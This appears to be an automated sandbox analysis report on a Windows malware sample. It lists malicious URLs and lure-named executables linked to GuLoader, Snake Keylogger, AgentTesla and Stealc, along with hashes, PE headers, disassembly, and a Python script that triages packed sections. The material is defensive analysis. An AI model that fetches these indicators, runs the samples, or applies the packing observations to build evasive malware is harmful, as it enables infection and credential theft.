37f463bf4616ecd445d4a1937da06e19 | https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0Y7M4M4N1J5K4K6Y6N5R4&c=E,1,OlGTQS9-XwC2vBMWr7I6ylXZJam5iCAEz8vCZAxOsyVrFii_1IhqZZqiTz_dLP-ondxd1F0_mQoffiXjC_RNTQQ_48xVwrK55zuEfYrxqUa2Wr6UOEIpqcM,&typo=1 | malicious | Unknown | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1 | malicious | Unknown | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | oNL2jSvLHj.exe | malicious | Stealc, Vidar | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | Certificado FNMT-RCM.exe | malicious | GuLoader, Snake Keylogger | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | COMPROBANTE DE PAGO.exe | malicious | AgentTesla, GuLoader | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | Justificante.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | n#U00ba 7064-2024.exe | malicious | GuLoader, Snake Keylogger | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | Factura 1-014685.pdf.exe | malicious | GuLoader, Snake Keylogger | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.56.70
                                                      No context
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9634562114790366
                                                      Encrypted:false
                                                      SSDEEP:96:FlaTBsBhsz7pnMQXIDcQhc6zrcETcw31Ygy+HbHg/opAnQr39DDWpsOyP6N+mtZ3:PwB90PD5njSXZrMZtzuiFpZ24IO8N
                                                      MD5:F6D6F36D314AAA4774019726F1C05FDA
                                                      SHA1:F8EDF93D08471190E1DD3B9D69E2D1B024B48DE5
                                                      SHA-256:CE0A7A664A77BD7502853A277BB6D95B0737402AD732283EF4016074D8147ABD
                                                      SHA-512:3ABC65D64CB77B4F03E5445435F350C882015F2A02156300FF5E54118B922EFF261F8A186D0827FDC3ADDEE693E53AC56EB74EAA46B5DBBA7515A047D629849A
                                                      Malicious:false
                                                      Reputation:low
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 20:37:15 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):60476
                                                      Entropy (8bit):1.9095634653547193
                                                      Encrypted:false
                                                      SSDEEP:384:qZePOSruEE7oaK75jboqw/CMI6qXvyEBfj:qGO5EEU5jboqXMI6myuj
                                                      MD5:39CB4F8E687AEDF51B9778C3FE827080
                                                      SHA1:2F457E14FBA16C0AD0A84C917C00E0A29E35BAE4
                                                      SHA-256:D39C284D1629663F6B1516BFD0706FBF5B0016F76CDA48DDC59B4B8DF9433C1B
                                                      SHA-512:8ED8652C956FB277AA0AAB0D0353195A43FDD23CB456AE184AF9E234BA7D0976238539B215A602FF3C8EE3FE90AC0AFE44E9D8521EABB1DEF848440AB0209A02
                                                      Malicious:false
                                                      Reputation:low
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8308
                                                      Entropy (8bit):3.6971397478287087
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJd26ver6Y4a6CVgmfHXpDT89bCPsf0/Wm:R6lXJs6vK6YN6QgmfH2C0fq
                                                      MD5:4C5103AC7B88C58276B30BA4A2797E2F
                                                      SHA1:09EA0433F39120758EAD9645981AD25028B9D14E
                                                      SHA-256:88A162641C55A028377D2EF33651B21DB5B7C1C5D65C0F03F6C889F87E506EA9
                                                      SHA-512:1A648218D6E76C286BE8FCF0A1D7775A75609C1E1477037F9A91A32148860A9DEDFACF91FF34A52DEF0FAEBC2592D5D1F96B157C13DDCB6972B2D8C24F25E6E0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.5.6.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4565
                                                      Entropy (8bit):4.441325515663391
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsXJg77aI9HMWpW8VYvYm8M4JdtF4W4+q8oiEp8oifd:uIjf5I7xl7V/JswEp/ifd
                                                      MD5:E1E198B64AEBA6DA8333449D142C5B04
                                                      SHA1:1231E7960042540B5AD55D7C8B7D7EA0363AF952
                                                      SHA-256:3C91C588ADBAF31FDB57F2244C13CBA1E25AAFD3E05301B845E6D520D8D9509D
                                                      SHA-512:A288C44F3FEC9FB664F9B41DAEA9C55D0A1B5E04F192285977C415D5633DBD0622125C326CB775804A8ECCC8A01E13532530FFF563CAC1862870E8A3F5E7312E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559419" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):351744
                                                      Entropy (8bit):6.763877856831789
                                                      Encrypted:false
                                                      SSDEEP:6144:9as81rSM11vPDW3R8LUlZ3yXeNPV65UJmz:JIF11nD2R/33IS65UE
                                                      MD5:E00B441455DC50083BB537C343EB1B99
                                                      SHA1:BE39981C9812335B02846A1098E18A0CEFFF370D
                                                      SHA-256:63797AD6A754066E10BDA16D14D5D54714A2A1D14CAA392D3B157187075616CA
                                                      SHA-512:D169C4FD07105282306F03D0ED600EE9BE762911138CA914E6585AAE6865F80ABCC4E2A588F9A3C9E2D26DA6B8CE83E10271CC81A269DAC82EA505E1BA90AE36
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}\]...]...]......\...C..A...C..L...C......zRh.Z...]...!...C..\...C..\...C..\...Rich]...........PE..L....I.e.................p........................@...........................&.................................................P........}...........................................................................................................text....o.......p.................. ..`.rdata...".......$...t..............@..@.data...|........H..................@....rsrc....].......~..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):351744
                                                      Entropy (8bit):6.763877856831789
                                                      Encrypted:false
                                                      SSDEEP:6144:9as81rSM11vPDW3R8LUlZ3yXeNPV65UJmz:JIF11nD2R/33IS65UE
                                                      MD5:E00B441455DC50083BB537C343EB1B99
                                                      SHA1:BE39981C9812335B02846A1098E18A0CEFFF370D
                                                      SHA-256:63797AD6A754066E10BDA16D14D5D54714A2A1D14CAA392D3B157187075616CA
                                                      SHA-512:D169C4FD07105282306F03D0ED600EE9BE762911138CA914E6585AAE6865F80ABCC4E2A588F9A3C9E2D26DA6B8CE83E10271CC81A269DAC82EA505E1BA90AE36
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}\]...]...]......\...C..A...C..L...C......zRh.Z...]...!...C..\...C..\...C..\...Rich]...........PE..L....I.e.................p........................@...........................&.................................................P........}...........................................................................................................text....o.......p.................. ..`.rdata...".......$...t..............@..@.data...|........H..................@....rsrc....].......~..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.465465532668864
                                                      Encrypted:false
                                                      SSDEEP:6144:/IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNBdwBCswSb6:wXD94+WlLZMM6YFHH+6
                                                      MD5:54F93B919F2E5CE84A410EA0FD802BAF
                                                      SHA1:1D7EF6B1396250191970DD0BBCDC7476EB2A0C4E
                                                      SHA-256:FCBC0136DFE25608B1F8236EFDBD0709518BBE0A45F20B154EEF3C8A0AEB2794
                                                      SHA-512:4890107CDC304DA3D0672FAB434BC237C3C4D5FA991255E156609AE3C8655E8541719DF09D4F1520176200C4D05B65E87980190BF0A0F84D9A55F5DA1DC6357F
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....'...............................................................................................................................................................................................................................................................................................................................................B.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):6.803050419675933
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:VAIIBIHmtT.exe
                                                      File size:463'872 bytes
                                                      MD5:35489d9dc0929e90b0b89b4f569df8c1
                                                      SHA1:57010eda768b5bf82e306443f1df42f521bbad91
                                                      SHA256:53fe5c2231b5b1753668ef852cb61e233cc389fdf8a2ac6afe2028bdd9509df6
                                                      SHA512:7253f7c0ab1b1dfeae4058c3d8b9d27c7b1198d4c03a2077d1dfa3b4fdc6a1bdb12c15484a8b01427eb9d3efcd407951508bdf50e35282c3bcba498d8557460b
                                                      SSDEEP:6144:YLI/zz3WcgfnaQkjXI7fAzEPaGyeohq5WUKXHvcB6vGH/k7YR0T3:Yk/zz39sUYMEPDyLhtfXPPMW
                                                      TLSH:DAA4F190B9C4F831C5A24E748C39D7EA297EB8328624494B372C7F5F3D752D29AB1316
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7.(.s.F.s.F.s.F.m...h.F.m...k.F.m.....F.T.=.z.F.s.G...F.m...r.F.m...r.F.m...r.F.Richs.F.................PE..L..._.?e...........
                                                      Icon Hash:86c7c30b0f4e0d19
                                                      Entrypoint:0x403943
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x653FFC5F [Mon Oct 30 18:56:31 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:9ed66fda5fccdbfc3c7dba376824972f
                                                      Instruction
                                                      call 00007FD4F07E8EDEh
                                                      jmp 00007FD4F07E575Eh
                                                      int3
                                                      int3
                                                      int3
                                                      call 00007FD4F07E591Ch
                                                      xchg cl, ch
                                                      jmp 00007FD4F07E5904h
                                                      call 00007FD4F07E5913h
                                                      fxch st(0), st(1)
                                                      jmp 00007FD4F07E58FBh
                                                      fabs
                                                      fld1
                                                      mov ch, cl
                                                      xor cl, cl
                                                      jmp 00007FD4F07E58F1h
                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                      fabs
                                                      fxch st(0), st(1)
                                                      fabs
                                                      fxch st(0), st(1)
                                                      fpatan
                                                      or cl, cl
                                                      je 00007FD4F07E58E6h
                                                      fldpi
                                                      fsubrp st(1), st(0)
                                                      or ch, ch
                                                      je 00007FD4F07E58E4h
                                                      fchs
                                                      ret
                                                      fabs
                                                      fld st(0), st(0)
                                                      fld st(0), st(0)
                                                      fld1
                                                      fsubrp st(1), st(0)
                                                      fxch st(0), st(1)
                                                      fld1
                                                      faddp st(1), st(0)
                                                      fmulp st(1), st(0)
                                                      ftst
                                                      wait
                                                      fstsw word ptr [ebp-000000A0h]
                                                      wait
                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                      jne 00007FD4F07E58E7h
                                                      xor ch, ch
                                                      fsqrt
                                                      ret
                                                      pop eax
                                                      jmp 00007FD4F07E90AFh
                                                      fstp st(0)
                                                      fld tbyte ptr [0045755Ah]
                                                      ret
                                                      fstp st(0)
                                                      or cl, cl
                                                      je 00007FD4F07E58EDh
                                                      fstp st(0)
                                                      fldpi
                                                      or ch, ch
                                                      je 00007FD4F07E58E4h
                                                      fchs
                                                      ret
                                                      fstp st(0)
                                                      fldz
                                                      or ch, ch
                                                      je 00007FD4F07E58D9h
                                                      fchs
                                                      ret
                                                      fstp st(0)
                                                      jmp 00007FD4F07E9085h
                                                      fstp st(0)
                                                      mov cl, ch
                                                      jmp 00007FD4F07E58E2h
                                                      call 00007FD4F07E58AEh
                                                      jmp 00007FD4F07E9090h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push ebp
                                                      mov ebp, esp
                                                      add esp, FFFFFD30h
                                                      push ebx
                                                      Programming Language:
                                                      • [C++] VS2008 build 21022
                                                      • [ASM] VS2008 build 21022
                                                      • [ C ] VS2008 build 21022
                                                      • [IMP] VS2005 build 50727
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5651c | 0x64 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x68000 | 0x13f28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c000 | 0x910 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2638 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x190 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x55e62 | 0x56000 | 0104407b6e1f0f61edf7aa959c97a772 | False | 0.7920972247456395 | data | 7.267782607208231 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x57000 | 0x10598 | 0x5c00 | afdd07fa947c0d9730405c2e6a6d3deb | False | 0.07931385869565218 | Matlab v4 mat-file (little endian) n2, sparse, rows 0, columns 0 | 0.9306250999888682 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x68000 | 0x13f28 | 0x14000 | 58118a4681a559ec7e3cab621d34fa93 | False | 0.47679443359375 | data | 5.570433876023632 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7c000 | 0x1350 | 0x1400 | 43c4d62d41a0a83d6468742d5517ef08 | False | 0.396484375 | data | 3.8593706022686 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
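The data-directory table reports which section each RVA lands in, and the section table reports an 8-bit entropy and a ZLIB complexity per section. The Python below is an added example, not Joe Sandbox code and not code from the sample, that reproduces the "Is in Section" lookup from the section table, recomputes the two statistics on constructed buffers, and applies the packing heuristics an analyst would apply to these numbers (a high-entropy executable section, a section that is both writable and executable, an executable section much larger in memory than on disk). The section values, ImageBase and Entrypoint are transcribed from this report; the 7.0 entropy threshold, the one-page slack in the size check, and the reading of "ZLIB Complexity" as compressed size divided by raw size are my assumptions.

```python
import hashlib
import math
import zlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int   # RVA of the section start
    virtual_size: int
    raw_size: int
    entropy: float         # 8-bit Shannon entropy as reported
    characteristics: frozenset


# Transcribed from the section table of this report (VAIIBIHmtT.exe).
SECTIONS = [
    Section(".text", 0x1000, 0x55e62, 0x56000, 7.267782607208231,
            frozenset({"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"})),
    Section(".data", 0x57000, 0x10598, 0x5c00, 0.9306250999888682,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ", "IMAGE_SCN_MEM_WRITE"})),
    Section(".rsrc", 0x68000, 0x13f28, 0x14000, 5.570433876023632,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"})),
    Section(".reloc", 0x7c000, 0x1350, 0x1400, 3.8593706022686,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_DISCARDABLE", "IMAGE_SCN_MEM_READ"})),
]

IMAGE_BASE = 0x400000   # from the header block above
ENTRYPOINT = 0x403943   # virtual address from the header block above


def section_for_rva(sections, rva):
    """Name of the section whose range [VA, VA + max(vsize, rawsize)) contains rva, else None."""
    for s in sections:
        span = max(s.virtual_size, s.raw_size)
        if s.virtual_address <= rva < s.virtual_address + span:
            return s.name
    return None


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Assumed definition of the ZLIB Complexity column: zlib-compressed size / raw size."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def triage_sections(sections, entropy_threshold=7.0):
    """Packing heuristics over the section table. Returns (section name, reason) pairs."""
    findings = []
    for s in sections:
        executable = "IMAGE_SCN_MEM_EXECUTE" in s.characteristics
        if executable and s.entropy >= entropy_threshold:
            findings.append((s.name, f"executable section with entropy {s.entropy:.2f}; packed or encrypted code likely"))
        if executable and "IMAGE_SCN_MEM_WRITE" in s.characteristics:
            findings.append((s.name, "section is writable and executable"))
        if executable and s.virtual_size > s.raw_size + 0x1000:
            findings.append((s.name, f"virtual size 0x{s.virtual_size:x} exceeds raw size 0x{s.raw_size:x} by more than a page; room to unpack in place"))
    return findings


# Constructed sample buffers (not bytes from the sample): one incompressible, one constant.
PSEUDO_RANDOM = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # 4096 bytes
ZERO_FILL = bytes(4096)


if __name__ == "__main__":
    for name, reason in triage_sections(SECTIONS):
        print(f"{name}: {reason}")
    print("entrypoint section:", section_for_rva(SECTIONS, ENTRYPOINT - IMAGE_BASE))
    for label, buf in (("pseudo-random", PSEUDO_RANDOM), ("zero-fill", ZERO_FILL)):
        print(f"{label}: entropy={shannon_entropy(buf):.3f} zlib={zlib_complexity(buf):.3f}")
```

On this sample only .text is flagged: entropy 7.27 in the sole executable section, with the section smaller in memory than on disk, which is what a stub that decrypts a payload into freshly allocated memory rather than in place looks like. The entropy of a whole file can hide this, because low-entropy data and resources pull the average down; always read it per section.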
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
BECUSABOKIBEVOHESIYOW | 0x721a0 | 0x136f | ASCII text, with very long lines (4975), with no line terminators | Tamil | India | 0.5947738693467337
BECUSABOKIBEVOHESIYOW | 0x721a0 | 0x136f | ASCII text, with very long lines (4975), with no line terminators | Tamil | Sri Lanka | 0.5947738693467337
XUBONAVEGUCIZAKUFAMABAWADUJATA | 0x73510 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | India | 0.5879156423858196
XUBONAVEGUCIZAKUFAMABAWADUJATA | 0x73510 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | Sri Lanka | 0.5879156423858196
RT_CURSOR | 0x753a0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | - | - | 0.2953091684434968
RT_CURSOR | 0x76248 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | - | - | 0.46705776173285196
RT_CURSOR | 0x76af0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | - | - | 0.5361271676300579
RT_CURSOR | 0x77088 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | - | - | 0.4375
RT_CURSOR | 0x771b8 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | - | - | 0.44886363636363635
RT_CURSOR | 0x77290 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | - | - | 0.27238805970149255
RT_CURSOR | 0x78138 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | - | - | 0.375
RT_CURSOR | 0x789e0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | - | - | 0.5057803468208093
RT_CURSOR | 0x78f78 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | - | - | 0.30943496801705755
RT_CURSOR | 0x79e20 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | - | - | 0.427797833935018
RT_CURSOR | 0x7a6c8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | - | - | 0.5469653179190751
RT_ICON | 0x68860 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.7857142857142857
RT_ICON | 0x68860 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.7857142857142857
RT_ICON | 0x68f28 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.8043568464730291
RT_ICON | 0x68f28 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.8043568464730291
RT_ICON | 0x6b4d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.8634751773049646
RT_ICON | 0x6b4d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.8634751773049646
RT_ICON | 0x6b968 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.36886993603411516
RT_ICON | 0x6b968 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.36886993603411516
RT_ICON | 0x6c810 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.5130866425992779
RT_ICON | 0x6c810 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.5130866425992779
RT_ICON | 0x6d0b8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.5841013824884793
RT_ICON | 0x6d0b8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.5841013824884793
RT_ICON | 0x6d780 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.6502890173410405
RT_ICON | 0x6d780 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.6502890173410405
RT_ICON | 0x6dce8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | India | 0.462448132780083
RT_ICON | 0x6dce8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | Sri Lanka | 0.462448132780083
RT_ICON | 0x70290 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | India | 0.475375234521576
RT_ICON | 0x70290 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | Sri Lanka | 0.475375234521576
RT_ICON | 0x71338 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | India | 0.45778688524590166
RT_ICON | 0x71338 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | Sri Lanka | 0.45778688524590166
RT_ICON | 0x71cc0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | India | 0.5106382978723404
RT_ICON | 0x71cc0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | Sri Lanka | 0.5106382978723404
RT_DIALOG | 0x7aeb0 | 0x58 | data | - | - | 0.8977272727272727
RT_STRING | 0x7af08 | 0x374 | data | Tamil | India | 0.46945701357466063
RT_STRING | 0x7af08 | 0x374 | data | Tamil | Sri Lanka | 0.46945701357466063
RT_STRING | 0x7b280 | 0x2ae | data | Tamil | India | 0.478134110787172
RT_STRING | 0x7b280 | 0x2ae | data | Tamil | Sri Lanka | 0.478134110787172
RT_STRING | 0x7b530 | 0x4e8 | data | Tamil | India | 0.4434713375796178
RT_STRING | 0x7b530 | 0x4e8 | data | Tamil | Sri Lanka | 0.4434713375796178
RT_STRING | 0x7ba18 | 0x510 | data | Tamil | India | 0.42746913580246915
RT_STRING | 0x7ba18 | 0x510 | data | Tamil | Sri Lanka | 0.42746913580246915
RT_ACCELERATOR | 0x75348 | 0x58 | data | Tamil | India | 0.7954545454545454
RT_ACCELERATOR | 0x75348 | 0x58 | data | Tamil | Sri Lanka | 0.7954545454545454
RT_GROUP_CURSOR | 0x77058 | 0x30 | data | - | - | 0.9375
RT_GROUP_CURSOR | 0x77268 | 0x22 | data | - | - | 1.0588235294117647
